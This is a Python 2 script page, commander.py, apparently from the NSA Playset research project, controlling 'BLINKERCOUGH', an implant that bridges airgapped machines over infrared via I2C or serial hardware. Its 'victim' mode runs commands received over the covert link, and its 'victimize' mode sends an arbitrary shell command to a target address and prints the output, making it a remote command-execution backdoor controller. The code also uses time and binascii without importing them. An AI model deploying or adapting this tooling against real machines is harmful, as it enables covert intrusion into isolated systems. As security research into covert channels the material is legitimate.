-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathcommander.py
executable file
·144 lines (134 loc) · 4.03 KB
/
commander.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/usr/bin/python
#
# BLINKERCOUGH: NSA Playset implant for IR bridging of airgap
#
# Copyright (C) 2015 Hacker, J.R. <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from blinkercough import *
import sys
import os
import re
def output_hook(output):
print output
def terminated_hook(code):
print "command exited with exit code", code
def print_hook(source, packet):
print "packet from", source
print binascii.hexlify(packet)
if len(sys.argv) < 3:
print "usage script <i2c bus or serial tty> <action>"
sys.exit(1)
def convert(value):
result = None
hexstr = False
if re.match('[\da-fA-F]+', value):
hexstr = True
try:
if hexstr:
result = int(value, 16)
else:
result = int(value, 0)
except ValueError:
print "can't convert '%s' to int" % value
sys.exit(1)
return result
dev = sys.argv[1]
devtype = None
BC = None
try:
int(dev)
# must be i2c
devtype = 'i2c'
BC = BlinkerCough(i2cDevice(int(dev)))
except ValueError:
# must be a serial
devtype = 'serial'
BC = BlinkerCough(SerialDevice(dev, 115200))
action = sys.argv[2]
if action == 'getaddr':
addr = BC.get_address()
print "blinker cough address is: 0x%04x" % addr
elif action == 'setaddr':
if len(sys.argv) != 4:
print "didn't supply address"
sys.exit(1)
BC.set_address(int(sys.argv[3]))
elif action == 'sendstuff':
to = 0000
if len(sys.argv) == 4:
to = convert(sys.argv[3])
for i in range(0,5):
print "sending packet %d to: 0x%04x" % (i, to)
stufflen = 120
stuff = '\xFE\xED\xFA\xCE\xDE\xAD\xBE\xEF'
stuff += '\xff'*(119 - len(stuff))+'\xf0'
BC.send(to, stuff)
BC.poll_for(35)
while True:
BC.poll()
time.sleep(0.5)
sys.stdout.write(".")
sys.stdout.flush()
elif action == 'listen':
BlinkerCough.receive_hook = staticmethod(print_hook)
print "waiting for packets at address 0x%04x" % BC.address
sys.stdout.write("polling...")
sys.stdout.flush()
while True:
BC.poll()
time.sleep(0.5)
sys.stdout.write(".")
sys.stdout.flush()
elif action == 'victim':
print "playing the victim at address 0x%04x" % BC.address
CR = CommandRunner(BC)
BlinkerCough.receive_hook = CR.on_recv
CommandRunner.send_hook = BC.send
sys.stdout.write("polling...")
sys.stdout.flush()
while True:
BC.poll()
time.sleep(0.5)
sys.stdout.write(".")
sys.stdout.flush()
elif action == 'victimize':
if len(sys.argv) != 5:
print "victimize requires victim and cmd"
sys.exit(1)
victim = convert(sys.argv[3])
cmd = sys.argv[4]
print "victim: 0x%04x cmd '%s'" % (victim, cmd)
CR = CommandRunner(BC)
BlinkerCough.receive_hook = CR.on_recv
CommandRunner.send_hook = BC.send
CommandRunner.output_hook = staticmethod(output_hook)
CommandRunner.terminated_hook = staticmethod(terminated_hook)
CR.run_remote_command(victim, cmd)
while True:
BC.poll()
time.sleep(0.5)
sys.stdout.write(".")
sys.stdout.flush()
else:
print "I don't action '%s'" % action
print "actions available:"
print " getaddr"
print " setaddr"
print " sendstuff"
print " listen"
print " victim"
print " victimize"
sys.exit(1)